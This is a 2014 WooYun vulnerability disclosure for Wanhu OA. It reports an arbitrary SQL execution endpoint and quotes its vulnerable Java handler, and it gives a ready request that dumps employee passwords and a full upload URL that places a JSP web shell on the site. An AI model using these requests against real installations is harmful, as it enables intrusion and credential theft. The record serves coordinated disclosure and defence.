当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-064324

漏洞标题:万户OA任意sql语句执行(标准版)

相关厂商:万户OA

漏洞作者: 路人甲

提交时间:2014-06-10 14:23

修复时间:2014-09-08 14:24

公开时间:2014-09-08 14:24

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-06-10: 细节已通知厂商并且等待厂商处理中
2014-06-14: 厂商已经确认,细节仅向厂商公开
2014-06-17: 细节向第三方安全合作伙伴开放
2014-08-08: 细节向核心白帽子及相关领域专家公开
2014-08-18: 细节向普通白帽子公开
2014-08-28: 细节向实习白帽子公开
2014-09-08: 细节向公众公开

简要描述:

万户OA任意sql语句执行(标准版)

详细说明:

1.开始在这里发现能执行sql语句,只是将textarea设为readonly自己去掉就行了。

defaultroot/graphreport/runsql.jsp


2.也可以直接给处理类提交数据

/defaultroot/GraphReportAction.do?action=showResult


dataSQL=select USERPASSWORD,EMP_ID,EMPNAME,USERACCOUNTS from org_employee


取得dataSQL后直接执行返回给前端~

public ActionForward showResult(ActionMapping mapping, ActionForm form, HttpServletRequest request, HttpServletResponse response)
throws Exception
{
String sql = request.getParameter("dataSQL");
GraphReportBD bd = new GraphReportBD();
List list = new ArrayList();
list = bd.getData(sql);
request.setAttribute("list", list);
return mapping.findForward("result");
}


sql.PNG

sql2.PNG

漏洞证明:

前面太多人提交文件上传了,怕重复就在这里提交吧。

/defaultroot/govezoffice/custom_documentmanager/smartUpload.jsp?path=..&mode=add&fileName=hello.jsp&saveName=hello.jsp&tableName=hello.jsp&fileMaxSize=0&fileMaxNum=null&fileType=jsp&fileMinWidth=0&fileMinHeight=0&fileMaxWidth=0&fileMaxHeight=0


往如上链接上传就可以直接将shell传到首页了。

.jpg


修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2014-06-14 22:51

厂商回复:

CNVD确认并复现所述案例情况,由CNVD通过以往处置渠道联系万户软件公司,发zhuobq<zhuobq > 处置。

最新状态:

暂无